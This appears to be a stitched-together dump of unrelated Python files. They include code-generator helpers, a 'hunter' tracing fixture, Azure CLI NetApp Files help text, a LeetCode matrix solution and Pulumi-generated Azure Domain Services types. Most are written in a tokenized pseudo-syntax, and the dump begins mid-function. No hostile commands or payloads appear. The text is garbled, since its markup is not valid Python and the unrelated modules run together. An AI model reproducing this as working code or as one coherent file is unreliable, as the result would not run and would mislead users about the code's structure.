n)<block_start><return>n[:-2]<block_end><else_stmt><block_start><return>n<block_end><block_end>@staticmethod<def_stmt>extract_description d<block_start>""" Extract description :param d: list with description :return: evaluated string """<line_sep><return>re.sub(r'(\s{2,}|\n)' ' ' ''.join(d)).strip()<if>d<else>''<block_end>@staticmethod<def_stmt>extract_values param<block_start>p=OrderedDict()<if_stmt>hasattr(param.param_type 'min_size')<block_start>p['array_min_size']=param.param_type.min_size<block_end><if_stmt>hasattr(param.param_type 'max_size')<block_start>p['array_max_size']=param.param_type.max_size<block_end><if_stmt>hasattr(param 'default_value')<block_start><if_stmt>hasattr(param.default_value 'name')<block_start>p['default_value']=param.default_value.name<block_end><else_stmt><block_start>p['default_value']=param.default_value<block_end><block_end><elif_stmt>hasattr(param.param_type 'default_value')<block_start><if_stmt>hasattr(param.param_type.default_value 'name')<block_start>p['default_value']=param.param_type.default_value.name<block_end><else_stmt><block_start>p['default_value']=param.param_type.default_value<block_end><block_end><if_stmt>hasattr(param.param_type 'min_value')<block_start>p['num_min_value']=param.param_type.min_value<block_end><elif_stmt>hasattr(param.param_type 'element_type')<and>hasattr(param.param_type.element_type 'min_value')<block_start>p['num_min_value']=param.param_type.element_type.min_value<block_end><if_stmt>hasattr(param.param_type 'max_value')<block_start>p['num_max_value']=param.param_type.max_value<block_end><elif_stmt>hasattr(param.param_type 'element_type')<and>hasattr(param.param_type.element_type 'max_value')<block_start>p['num_max_value']=param.param_type.element_type.max_value<block_end><if_stmt>hasattr(param.param_type 'min_length')<block_start>p['string_min_length']=param.param_type.min_length<block_end><elif_stmt>hasattr(param.param_type 'element_type')<and>hasattr(param.param_type.element_type 
'min_length')<block_start>p['string_min_length']=param.param_type.element_type.min_length<block_end><if_stmt>hasattr(param.param_type 'max_length')<block_start>p['string_max_length']=param.param_type.max_length<block_end><elif_stmt>hasattr(param.param_type 'element_type')<and>hasattr(param.param_type.element_type 'max_length')<block_start>p['string_max_length']=param.param_type.element_type.max_length<block_end># Filter None values filtered_values={k:v<for>k,v p.items()<if>v<is><not><none>}<line_sep><return>filtered_values<block_end>@staticmethod<def_stmt>replace_sync name<block_start>""" :param name: string with item name :return: string with replaced 'sync' to 'Sdl' """<if_stmt>name<block_start><return>re.sub(r'^([sS])ync(.+)$' r'\1dl\2' name)<block_end><return>name<block_end><def_stmt>replace_keywords self name:str=''<arrow>str<block_start>""" if :param name in self.key_words, :return: name += 'Param' :param name: string with item name """<if_stmt>any(map(<lambda>k:re.search(r'^(get|set|key_)?{}$'.format(name.casefold()) k) self.key_words))<block_start>origin=name<if_stmt>name.isupper()<block_start>name<augadd>'_PARAM'<block_end><else_stmt><block_start>name<augadd>'Param'<block_end>self.logger.debug('Replacing %s with %s' origin name)<block_end><return>self.replace_sync(name)<block_end><def_stmt>extract_type self param<block_start>""" Evaluate and extract type :param param: sub-element Param of element from initial Model :return: string with sub-element type """<def_stmt>evaluate t1<block_start><if_stmt>isinstance(t1 Struct)<or>isinstance(t1 Enum)<block_start>name=t1.name<line_sep><return>name<block_end><else_stmt><block_start><return>type(t1).__name__<block_end><block_end><if_stmt>isinstance(param.param_type Array)<block_start><return>'List<{}>'.format(evaluate(param.param_type.element_type))<block_end><else_stmt><block_start><return>evaluate(param.param_type)<block_end><block_end><block_end>
# NOTE(review): this module appears to be a tracing fixture for hunter's
# Backlog feature (see __main__ below). The functions deliberately share
# the same shape -- mutable default arguments, a chained assignment side
# effect, a single-iteration loop -- presumably so the recorded frames
# and variables are predictable. Do not "clean up" the mutable defaults
# or reorder lines: the traced output likely depends on the exact line
# structure -- confirm with the corresponding test before refactoring.
from __future__ import print_function


def one(a=123, b='234', c={'3': [4, '5']}):
    for i in range(1):  # one
        a = b = c['side'] = 'effect'
        two()


def two(a=123, b='234', c={'3': [4, '5']}):
    for i in range(1):  # two
        a = b = c['side'] = 'effect'
        three()


def three(a=123, b='234', c={'3': [4, '5']}):
    for i in range(1):  # three
        a = b = c['side'] = 'effect'
        four()


def four(a=123, b='234', c={'3': [4, '5']}):
    for i in range(1):  # four
        a = b = c['side'] = 'effect'
        five()


def five(a=123, b='234', c={'3': [4, '5']}):
    # six() is filtered out of the trace below (~Q(function='six')).
    six()
    six()
    six()
    a = b = c['side'] = in_five = 'effect'
    for i in range(1):  # five
        return i
    # five


def six():
    pass


if __name__ == "__main__":
    from hunter import *
    from utils import DebugCallPrinter

    # Trace five() with a 15-frame backlog, excluding six() frames.
    trace(
        Backlog(stack=15, vars=True, action=DebugCallPrinter(' [' 'backlog' ']'), function='five').filter(~Q(function='six')),
        action=DebugCallPrinter
    )
    one()
    one()  # make sure Backlog is reusable (doesn't have storage side-effects)
    stop()
<import_from_future_stmt> absolute_import division print_function unicode_literals<import_stmt>os<line_sep>print("VAR is '{}'".format(os.environ["VAR"]))<line_sep>
# coding=utf-8 # -------------------------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # -------------------------------------------------------------------------------------------- <import_from_stmt>knack.help_files helps<line_sep># pylint: disable=line-too-long helps['netappfiles']=""" type: group short-summary: Manage Azure NetApp Files (ANF) Resources. """<line_sep># account helps['netappfiles account']=""" type: group short-summary: Manage Azure NetApp Files (ANF) Account Resources. """<line_sep>helps['netappfiles account create']=""" type: command short-summary: Create a new Azure NetApp Files (ANF) account. Note that active directory can only be applied to an existing account (using set/update). parameters: - name: --account-name -a -n type: string short-summary: The name of the ANF account - name: --tags type: string short-summary: A list of space separated tags to apply to the account examples: - name: Create an ANF account text: > az netappfiles account create -g group --account-name name -l location """<line_sep>helps['netappfiles account set']=""" type: command short-summary: Sets the tags or the active directory details for a specified ANF account. Sets the active directory property to exactly what is provided. If none is provided then the active directory is removed, i.e. provide empty []. parameters: - name: --account-name -a -n type: string short-summary: The name of the ANF account - name: --tags type: string short-summary: A list of space separated tags to apply to the account - name: --active-directories type: string short-summary: An array of active directory (AD) settings in json format. Limitation one AD/subscription. 
Consists of the fields username (Username of Active Directory domain administrator), password (Plain text password of Active Directory domain administrator), domain (Name of the Active Directory domain), dns (Comma separated list of DNS server IP addresses for the Active Directory domain), smb_server_name (NetBIOS name of the SMB server. This name will be registered as a computer account in the AD and used to mount volumes. Must be 10 characters or less), organizational_unit (The Organizational Unit (OU) within the Windows Active Directory) examples: - name: Update the tags and active directory of an ANF account text: > az netappfiles account set -g group --account-name name --tags 'key[=value] key[=value]' --active-directories '[{"username": "aduser", "password": "<PASSWORD>", "smbservername": "SMBSERVER", "dns": "192.168.3.11", "domain": "westcentralus"}]' -l westus2 - name: Remove the active directory from the ANF account text: > az netappfiles account set -g group --account-name name --active-directories '[]' -l westus2 """<line_sep>helps['netappfiles account update']=""" type: command short-summary: Set/modify the tags or the active directory details for a specified ANF account. Active directory settings are appended only - if none are present no change is made otherwise the active directory is replaced with that provided. parameters: - name: --account-name -a -n type: string short-summary: The name of the ANF account - name: --tags type: string short-summary: A list of space separated tags to apply to the account - name: --active-directories type: string short-summary: An array of active directory (AD) settings in json format. Limitation one AD/subscription. 
Consists of the fields username (Username of Active Directory domain administrator), password (Plain text password of Active Directory domain administrator), domain (Name of the Active Directory domain), dns (Comma separated list of DNS server IP addresses for the Active Directory domain), smb_server_name (NetBIOS name of the SMB server. This name will be registered as a computer account in the AD and used to mount volumes. Must be 10 characters or less), organizational_unit (The Organizational Unit (OU) within the Windows Active Directory) examples: - name: Update the tags and active directory of an ANF account text: > az netappfiles account update -g group --account-name name --tags 'key[=value] key[=value]' --active-directories '[{"username": "aduser", "password": "<PASSWORD>", "smbservername": "SMBSERVER", "dns": "192.168.3.11", "domain": "westcentralus"}]' -l westus2 """<line_sep>helps['netappfiles account delete']=""" type: command short-summary: Delete the specified ANF account. parameters: - name: --account-name -a -n type: string short-summary: The name of the ANF account examples: - name: Delete an ANF account text: > az netappfiles account delete -g group --account-name name """<line_sep>helps['netappfiles account list']=""" type: command short-summary: List ANF accounts. examples: - name: List ANF accounts within a resource group text: > az netappfiles account list -g group """<line_sep>helps['netappfiles account show']=""" type: command short-summary: Get the specified ANF account. parameters: - name: --account-name -a -n type: string short-summary: The name of the ANF account examples: - name: Get an ANF account text: > az netappfiles account show -g group --account-name name """<line_sep># pools helps['netappfiles pool']=""" type: group short-summary: Manage Azure NetApp Files (ANF) Pool Resources. """<line_sep>helps['netappfiles pool create']=""" type: command short-summary: Create a new Azure NetApp Files (ANF) pool. 
parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -n -p type: string short-summary: The name of the ANF pool - name: --size type: integer short-summary: The size for the ANF pool. Must be in 4 tebibytes increments, expressed in bytes - name: --service-level type: string short-summary: The service level for the ANF pool ["Standard"|"Premium"|"Extreme"] - name: --tags type: string short-summary: A list of space separated tags to apply to the pool examples: - name: Create an ANF pool text: > az netappfiles pool create -g group --account-name aname --pool-name pname -l location --size 4398046511104 --service-level "Premium" """<line_sep>helps['netappfiles pool update']=""" type: command short-summary: Update the tags of the specified ANF pool. parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -n -p type: string short-summary: The name of the ANF pool - name: --size type: integer short-summary: The size for the ANF pool. Must be in 4 tebibytes increments, expressed in bytes - name: --service-level type: string short-summary: The service level for the ANF pool ["Standard"|"Premium"|"Extreme"] - name: --tags type: string short-summary: A list of space separated tags to apply to the pool examples: - name: Update specific values for an ANF pool text: > az netappfiles pool update -g group --account-name aname --pool-name pname --service-level "Extreme" --tags 'key[=value] key[=value]' """<line_sep>helps['netappfiles pool delete']=""" type: command short-summary: Delete the specified ANF pool. 
parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -n -p type: string short-summary: The name of the ANF pool examples: - name: Delete an ANF pool text: > az netappfiles pool delete -g group --account-name aname --pool-name pname """<line_sep>helps['netappfiles pool list']=""" type: command short-summary: L:ist the ANF pools for the specified account. parameters: - name: --account-name -a -n type: string short-summary: The name of the ANF account examples: - name: List the pools for the ANF account text: > az netappfiles pool list -g group --account-name name """<line_sep>helps['netappfiles pool show']=""" type: command short-summary: Get the specified ANF pool. parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -n -p type: string short-summary: The name of the ANF pool examples: - name: Get an ANF pool text: > az netappfiles pool show -g group --account-name aname --pool-name pname """<line_sep># volumes helps['netappfiles volume']=""" type: group short-summary: Manage Azure NetApp Files (ANF) Volume Resources. """<line_sep>helps['netappfiles volume create']=""" type: command short-summary: Create a new Azure NetApp Files (ANF) volume. parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -p type: string short-summary: The name of the ANF pool - name: --volume-name -n -v type: string short-summary: The name of the ANF volume - name: --service-level type: string short-summary: The service level ["Standard"|"Premium"|"Extreme"] - name: --usage-threshold type: int short-summary: The maximum storage quota allowed for a file system in bytes. 
Min 100 GiB, max 100TiB" - name: --creation-token type: string short-summary: A unique file path identifier, from 1 to 80 characters - name: --subnet-id type: string short-summary: The subnet identifier - name: --tags type: string short-summary: A list of space separated tags to apply to the volume - name: --export-policy type: string short-summary: A json list of the parameters for export policy containing rule_index (Order index), unix_read_only (Read only access), unix_read_write (Read and write access), cifs (Allows CIFS protocol), nfsv3 (Allows NFSv3 protocol), nfsv4 (Allows NFSv4 protocol) and allowedClients (Client ingress specification as comma separated string with IPv4 CIDRs, IPv4 host addresses and host names) examples: - name: Create an ANF volume text: > az netappfiles volume create -g group --account-name aname --pool-name pname --volume-name vname -l location --service-level "Premium" --usage-threshold 107374182400 --creation-token "<PASSWORD>" --subnet-id "/subscriptions/mysubsid/resourceGroups/myrg/providers/Microsoft.Network/virtualNetworks/myvnet/subnets/default" --export-policy '[{"allowed_clients":"0.0.0.0/0", "rule_index": "1", "unix_read_only": "true", "unix_read_write": "false", "cifs": "false", "nfsv3": "true", "nfsv3": "true", "nfsv4": "false"}]' """<line_sep>helps['netappfiles volume update']=""" type: command short-summary: Update the specified ANF volume with the values provided. Unspecified values will remain unchanged. parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -p type: string short-summary: The name of the ANF pool - name: --volume-name -n -v type: string short-summary: The name of the ANF volume - name: --service-level type: string short-summary: The service level ["Standard"|"Premium"|"Extreme"] - name: --usage-threshold type: int short-summary: The maximum storage quota allowed for a file system in bytes. 
Min 100 GiB, max 100TiB" - name: --tags type: string short-summary: A list of space separated tags to apply to the volume - name: --export-policy type: string short-summary: A json list of the parameters for export policy containing rule_index (Order index), unix_read_only (Read only access), unix_read_write (Read and write access), cifs (Allows CIFS protocol), nfsv3 (Allows NFSv3 protocol), nfsv4 (Allows NFSv4 protocol) and allowedClients (Client ingress specification as comma separated string with IPv4 CIDRs, IPv4 host addresses and host names) examples: - name: Create an ANF volume text: > az netappfiles volume update -g group --account-name aname --pool-name pname --volume-name vname --service-level level --usage-threshold 107374182400 --tags 'key[=value] key[=value]' --export-policy '[{"allowed_clients":"1.2.3.0/24", "rule_index": "1", "unix_read_only": "true", "unix_read_write": "false", "cifs": "false", "nfsv3": "true", "nfsv3": "true", "nfsv4": "false"}, {"allowed_clients":"1.2.4.0/24", "rule_index": "2", "unix_read_only": "true", "unix_read_write": "false", "cifs": "false", "nfsv3": "true", "nfsv3": "true", "nfsv4": "false"}]' """<line_sep>helps['netappfiles volume delete']=""" type: command short-summary: Delete the specified ANF volume. parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -p type: string short-summary: The name of the ANF pool - name: --volume-name -n -v type: string short-summary: The name of the ANF volume examples: - name: Delete an ANF volume text: > az netappfiles volume delete -g group --account-name aname --pool-name pname --volume-name vname """<line_sep>helps['netappfiles volume list']=""" type: command short-summary: List the ANF Pools for the specified account. 
parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -n -p type: string short-summary: The name of the ANF pool examples: - name: List the ANF volumes of the pool text: > az netappfiles volume list -g group --account-name aname --pool-name pname """<line_sep>helps['netappfiles volume show']=""" type: command short-summary: Get the specified ANF volume. parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -p type: string short-summary: The name of the ANF pool - name: --volume-name -n -v type: string short-summary: The name of the ANF pool examples: - name: Returns the properties of the given ANF volume text: > az netappfiles volume show -g group --account-name aname --pool-name pname --volume-name vname """<line_sep># mounttargets helps['netappfiles mount-target']=""" type: group short-summary: Manage Azure NetApp Files (ANF) Mount Target Resources. """<line_sep>helps['netappfiles mount-target list']=""" type: command short-summary: List the mount targets of an ANF volume. parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -p type: string short-summary: The name of the ANF pool - name: --volume-name -v type: string short-summary: The name of the ANF pool examples: - name: list the mount targets of an ANF volume text: > az netappfiles mount-target list -g group --account-name aname --pool-name pname --volume-name vname """<line_sep># snapshots helps['netappfiles snapshot']=""" type: group short-summary: Manage Azure NetApp Files (ANF) Snapshot Resources. """<line_sep>helps['netappfiles snapshot create']=""" type: command short-summary: Create a new Azure NetApp Files (ANF) snapshot. 
parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -p type: string short-summary: The name of the ANF pool - name: --volume-name -v type: string short-summary: The name of the ANF volume - name: --snapshot-name -n -s type: string short-summary: The name of the ANF snapshot - name: --file-system-id type: string short-summary: The uuid of the volume examples: - name: Create an ANF snapshot text: > az netappfiles snapshot create -g group --account-name account-name --pool-name pname --volume-name vname --snapshot-name sname -l location --file-system-id volume-uuid """<line_sep>helps['netappfiles snapshot delete']=""" type: command short-summary: Delete the specified ANF snapshot. parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -p type: string short-summary: The name of the ANF pool - name: --volume-name -v type: string short-summary: The name of the ANF volume - name: --snapshot-name -n -s type: string short-summary: The name of the ANF snapshot examples: - name: Delete an ANF snapshot text: > az netappfiles snapshot delete -g group --account-name aname --pool-name pname --volume-name vname --snapshot-name sname """<line_sep>helps['netappfiles snapshot list']=""" type: command short-summary: List the snapshots of an ANF volume. parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -p type: string short-summary: The name of the ANF pool - name: --volume-name -n -v type: string short-summary: The name of the ANF volume examples: - name: list the snapshots of an ANF volume text: > az netappfiles snapshot list -g group --account-name aname --pool-name pname --volume-name vname """<line_sep>helps['netappfiles snapshot show']=""" type: command short-summary: Get the specified ANF snapshot. 
parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -p type: string short-summary: The name of the ANF pool - name: --volume-name -v type: string short-summary: The name of the ANF volume - name: --snapshot-name -n -s type: string short-summary: The name of the ANF snapshot examples: - name: Return the specified ANF snapshot text: > az netappfiles snapshot show -g group --account-name aname --pool-name pname --volume-name vname --snapshot-name sname """<line_sep>
# https://leetcode.com/problems/lucky-numbers-in-a-matrix <def_stmt>lucky_numbers matrix<block_start>all_lucky_numbers,all_mins=[] []<for_stmt>row matrix<block_start>found_min,col_index=float('Inf') -1<for_stmt>index,column enumerate(row)<block_start><if_stmt>column<l>found_min<block_start>found_min=column<line_sep>col_index=index<block_end><block_end>all_mins.append([found_min col_index])<block_end><for_stmt>a_min all_mins<block_start>[min_value min_column]=a_min<line_sep>maximum=float('-Inf')<for_stmt>index range(len(matrix))<block_start>num=matrix[index][min_column]<line_sep>maximum=max(num maximum)<block_end><if_stmt>maximum<eq>min_value<block_start>all_lucky_numbers.append(min_value)<block_end><block_end><return>all_lucky_numbers<block_end>
# coding=utf-8 # *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** <import_stmt>warnings<import_stmt>pulumi<import_stmt>pulumi.runtime<import_from_stmt>typing Any Mapping Optional Sequence Union overload<import_from_stmt>.. _utilities<line_sep>__all__=['ServiceInitialReplicaSet' 'ServiceNotifications' 'ServiceSecureLdap' 'ServiceSecurity' 'GetServiceNotificationResult' 'GetServiceReplicaSetResult' 'GetServiceSecureLdapResult' 'GetServiceSecurityResult' ]<line_sep>@pulumi.output_type<class_stmt>ServiceInitialReplicaSet(dict)<block_start>@staticmethod<def_stmt>__key_warning key:str<block_start>suggest=<none><if_stmt>key<eq>"subnetId"<block_start>suggest="subnet_id"<block_end><elif_stmt>key<eq>"domainControllerIpAddresses"<block_start>suggest="domain_controller_ip_addresses"<block_end><elif_stmt>key<eq>"externalAccessIpAddress"<block_start>suggest="external_access_ip_address"<block_end><elif_stmt>key<eq>"serviceStatus"<block_start>suggest="service_status"<block_end><if_stmt>suggest<block_start>pulumi.log.warn(f"Key '{key}' not found in ServiceInitialReplicaSet. Access the value via the '{suggest}' property getter instead.")<block_end><block_end><def_stmt>__getitem__ self key:str<arrow>Any<block_start>ServiceInitialReplicaSet.__key_warning(key)<line_sep><return>super().__getitem__(key)<block_end><def_stmt>get self key:str default=<none><arrow>Any<block_start>ServiceInitialReplicaSet.__key_warning(key)<line_sep><return>super().get(key default)<block_end><def_stmt>__init__ __self__ * subnet_id:str domain_controller_ip_addresses:Optional[Sequence[str]]=<none> external_access_ip_address:Optional[str]=<none> id:Optional[str]=<none> location:Optional[str]=<none> service_status:Optional[str]=<none><block_start>""" :param str subnet_id: The ID of the subnet in which to place the initial replica set. 
:param Sequence[str] domain_controller_ip_addresses: A list of subnet IP addresses for the domain controllers in the initial replica set, typically two. :param str external_access_ip_address: The publicly routable IP address for the domain controllers in the initial replica set. :param str id: The ID of the Domain Service. :param str location: The Azure location where the Domain Service exists. Changing this forces a new resource to be created. :param str service_status: The current service status for the initial replica set. """<line_sep>pulumi.set(__self__ "subnet_id" subnet_id)<if_stmt>domain_controller_ip_addresses<is><not><none><block_start>pulumi.set(__self__ "domain_controller_ip_addresses" domain_controller_ip_addresses)<block_end><if_stmt>external_access_ip_address<is><not><none><block_start>pulumi.set(__self__ "external_access_ip_address" external_access_ip_address)<block_end><if_stmt>id<is><not><none><block_start>pulumi.set(__self__ "id" id)<block_end><if_stmt>location<is><not><none><block_start>pulumi.set(__self__ "location" location)<block_end><if_stmt>service_status<is><not><none><block_start>pulumi.set(__self__ "service_status" service_status)<block_end><block_end>@property@pulumi.getter(name="subnetId")<def_stmt>subnet_id self<arrow>str<block_start>""" The ID of the subnet in which to place the initial replica set. """<line_sep><return>pulumi.get(self "subnet_id")<block_end>@property@pulumi.getter(name="domainControllerIpAddresses")<def_stmt>domain_controller_ip_addresses self<arrow>Optional[Sequence[str]]<block_start>""" A list of subnet IP addresses for the domain controllers in the initial replica set, typically two. """<line_sep><return>pulumi.get(self "domain_controller_ip_addresses")<block_end>@property@pulumi.getter(name="externalAccessIpAddress")<def_stmt>external_access_ip_address self<arrow>Optional[str]<block_start>""" The publicly routable IP address for the domain controllers in the initial replica set. 
"""<line_sep><return>pulumi.get(self "external_access_ip_address")<block_end>@property@pulumi.getter<def_stmt>id self<arrow>Optional[str]<block_start>""" The ID of the Domain Service. """<line_sep><return>pulumi.get(self "id")<block_end>@property@pulumi.getter<def_stmt>location self<arrow>Optional[str]<block_start>""" The Azure location where the Domain Service exists. Changing this forces a new resource to be created. """<line_sep><return>pulumi.get(self "location")<block_end>@property@pulumi.getter(name="serviceStatus")<def_stmt>service_status self<arrow>Optional[str]<block_start>""" The current service status for the initial replica set. """<line_sep><return>pulumi.get(self "service_status")<block_end><block_end>@pulumi.output_type<class_stmt>ServiceNotifications(dict)<block_start>@staticmethod<def_stmt>__key_warning key:str<block_start>suggest=<none><if_stmt>key<eq>"additionalRecipients"<block_start>suggest="additional_recipients"<block_end><elif_stmt>key<eq>"notifyDcAdmins"<block_start>suggest="notify_dc_admins"<block_end><elif_stmt>key<eq>"notifyGlobalAdmins"<block_start>suggest="notify_global_admins"<block_end><if_stmt>suggest<block_start>pulumi.log.warn(f"Key '{key}' not found in ServiceNotifications. Access the value via the '{suggest}' property getter instead.")<block_end><block_end><def_stmt>__getitem__ self key:str<arrow>Any<block_start>ServiceNotifications.__key_warning(key)<line_sep><return>super().__getitem__(key)<block_end><def_stmt>get self key:str default=<none><arrow>Any<block_start>ServiceNotifications.__key_warning(key)<line_sep><return>super().get(key default)<block_end><def_stmt>__init__ __self__ * additional_recipients:Optional[Sequence[str]]=<none> notify_dc_admins:Optional[bool]=<none> notify_global_admins:Optional[bool]=<none><block_start>""" :param Sequence[str] additional_recipients: A list of additional email addresses to notify when there are alerts in the managed domain. 
:param bool notify_dc_admins: Whether to notify members of the _AAD DC Administrators_ group when there are alerts in the managed domain. :param bool notify_global_admins: Whether to notify all Global Administrators when there are alerts in the managed domain. """<if_stmt>additional_recipients<is><not><none><block_start>pulumi.set(__self__ "additional_recipients" additional_recipients)<block_end><if_stmt>notify_dc_admins<is><not><none><block_start>pulumi.set(__self__ "notify_dc_admins" notify_dc_admins)<block_end><if_stmt>notify_global_admins<is><not><none><block_start>pulumi.set(__self__ "notify_global_admins" notify_global_admins)<block_end><block_end>@property@pulumi.getter(name="additionalRecipients")<def_stmt>additional_recipients self<arrow>Optional[Sequence[str]]<block_start>""" A list of additional email addresses to notify when there are alerts in the managed domain. """<line_sep><return>pulumi.get(self "additional_recipients")<block_end>@property@pulumi.getter(name="notifyDcAdmins")<def_stmt>notify_dc_admins self<arrow>Optional[bool]<block_start>""" Whether to notify members of the _AAD DC Administrators_ group when there are alerts in the managed domain. """<line_sep><return>pulumi.get(self "notify_dc_admins")<block_end>@property@pulumi.getter(name="notifyGlobalAdmins")<def_stmt>notify_global_admins self<arrow>Optional[bool]<block_start>""" Whether to notify all Global Administrators when there are alerts in the managed domain. 
"""<line_sep><return>pulumi.get(self "notify_global_admins")<block_end><block_end>@pulumi.output_type<class_stmt>ServiceSecureLdap(dict)<block_start>@staticmethod<def_stmt>__key_warning key:str<block_start>suggest=<none><if_stmt>key<eq>"pfxCertificate"<block_start>suggest="pfx_certificate"<block_end><elif_stmt>key<eq>"pfxCertificatePassword"<block_start>suggest="pfx_certificate_password"<block_end><elif_stmt>key<eq>"certificateExpiry"<block_start>suggest="certificate_expiry"<block_end><elif_stmt>key<eq>"certificateThumbprint"<block_start>suggest="certificate_thumbprint"<block_end><elif_stmt>key<eq>"externalAccessEnabled"<block_start>suggest="external_access_enabled"<block_end><elif_stmt>key<eq>"publicCertificate"<block_start>suggest="public_certificate"<block_end><if_stmt>suggest<block_start>pulumi.log.warn(f"Key '{key}' not found in ServiceSecureLdap. Access the value via the '{suggest}' property getter instead.")<block_end><block_end><def_stmt>__getitem__ self key:str<arrow>Any<block_start>ServiceSecureLdap.__key_warning(key)<line_sep><return>super().__getitem__(key)<block_end><def_stmt>get self key:str default=<none><arrow>Any<block_start>ServiceSecureLdap.__key_warning(key)<line_sep><return>super().get(key default)<block_end><def_stmt>__init__ __self__ * enabled:bool pfx_certificate:str pfx_certificate_password:str certificate_expiry:Optional[str]=<none> certificate_thumbprint:Optional[str]=<none> external_access_enabled:Optional[bool]=<none> public_certificate:Optional[str]=<none><block_start>""" :param bool enabled: Whether to enable secure LDAP for the managed domain. Defaults to `false`. :param str pfx_certificate: The certificate/private key to use for LDAPS, as a base64-encoded TripleDES-SHA1 encrypted PKCS#12 bundle (PFX file). :param str pfx_certificate_password: The password to use for decrypting the PKCS#12 bundle (PFX file). :param bool external_access_enabled: Whether to enable external access to LDAPS over the Internet. Defaults to `false`. 
"""<line_sep>pulumi.set(__self__ "enabled" enabled)<line_sep>pulumi.set(__self__ "pfx_certificate" pfx_certificate)<line_sep>pulumi.set(__self__ "pfx_certificate_password" pfx_certificate_password)<if_stmt>certificate_expiry<is><not><none><block_start>pulumi.set(__self__ "certificate_expiry" certificate_expiry)<block_end><if_stmt>certificate_thumbprint<is><not><none><block_start>pulumi.set(__self__ "certificate_thumbprint" certificate_thumbprint)<block_end><if_stmt>external_access_enabled<is><not><none><block_start>pulumi.set(__self__ "external_access_enabled" external_access_enabled)<block_end><if_stmt>public_certificate<is><not><none><block_start>pulumi.set(__self__ "public_certificate" public_certificate)<block_end><block_end>@property@pulumi.getter<def_stmt>enabled self<arrow>bool<block_start>""" Whether to enable secure LDAP for the managed domain. Defaults to `false`. """<line_sep><return>pulumi.get(self "enabled")<block_end>@property@pulumi.getter(name="pfxCertificate")<def_stmt>pfx_certificate self<arrow>str<block_start>""" The certificate/private key to use for LDAPS, as a base64-encoded TripleDES-SHA1 encrypted PKCS#12 bundle (PFX file). """<line_sep><return>pulumi.get(self "pfx_certificate")<block_end>@property@pulumi.getter(name="pfxCertificatePassword")<def_stmt>pfx_certificate_password self<arrow>str<block_start>""" The password to use for decrypting the PKCS#12 bundle (PFX file). 
"""<line_sep><return>pulumi.get(self "pfx_certificate_password")<block_end>@property@pulumi.getter(name="certificateExpiry")<def_stmt>certificate_expiry self<arrow>Optional[str]<block_start><return>pulumi.get(self "certificate_expiry")<block_end>@property@pulumi.getter(name="certificateThumbprint")<def_stmt>certificate_thumbprint self<arrow>Optional[str]<block_start><return>pulumi.get(self "certificate_thumbprint")<block_end>@property@pulumi.getter(name="externalAccessEnabled")<def_stmt>external_access_enabled self<arrow>Optional[bool]<block_start>""" Whether to enable external access to LDAPS over the Internet. Defaults to `false`. """<line_sep><return>pulumi.get(self "external_access_enabled")<block_end>@property@pulumi.getter(name="publicCertificate")<def_stmt>public_certificate self<arrow>Optional[str]<block_start><return>pulumi.get(self "public_certificate")<block_end><block_end>@pulumi.output_type<class_stmt>ServiceSecurity(dict)<block_start>@staticmethod<def_stmt>__key_warning key:str<block_start>suggest=<none><if_stmt>key<eq>"ntlmV1Enabled"<block_start>suggest="ntlm_v1_enabled"<block_end><elif_stmt>key<eq>"syncKerberosPasswords"<block_start>suggest="sync_kerberos_passwords"<block_end><elif_stmt>key<eq>"syncNtlmPasswords"<block_start>suggest="sync_ntlm_passwords"<block_end><elif_stmt>key<eq>"syncOnPremPasswords"<block_start>suggest="sync_on_prem_passwords"<block_end><elif_stmt>key<eq>"tlsV1Enabled"<block_start>suggest="tls_v1_enabled"<block_end><if_stmt>suggest<block_start>pulumi.log.warn(f"Key '{key}' not found in ServiceSecurity. 
Access the value via the '{suggest}' property getter instead.")<block_end><block_end><def_stmt>__getitem__ self key:str<arrow>Any<block_start>ServiceSecurity.__key_warning(key)<line_sep><return>super().__getitem__(key)<block_end><def_stmt>get self key:str default=<none><arrow>Any<block_start>ServiceSecurity.__key_warning(key)<line_sep><return>super().get(key default)<block_end><def_stmt>__init__ __self__ * ntlm_v1_enabled:Optional[bool]=<none> sync_kerberos_passwords:Optional[bool]=<none> sync_ntlm_passwords:Optional[bool]=<none> sync_on_prem_passwords:Optional[bool]=<none> tls_v1_enabled:Optional[bool]=<none><block_start>""" :param bool ntlm_v1_enabled: Whether to enable legacy NTLM v1 support. Defaults to `false`. :param bool sync_kerberos_passwords: Whether to synchronize Kerberos password hashes to the managed domain. Defaults to `false`. :param bool sync_ntlm_passwords: Whether to synchronize NTLM password hashes to the managed domain. Defaults to `false`. :param bool sync_on_prem_passwords: Whether to synchronize on-premises password hashes to the managed domain. Defaults to `false`. :param bool tls_v1_enabled: Whether to enable legacy TLS v1 support. Defaults to `false`. 
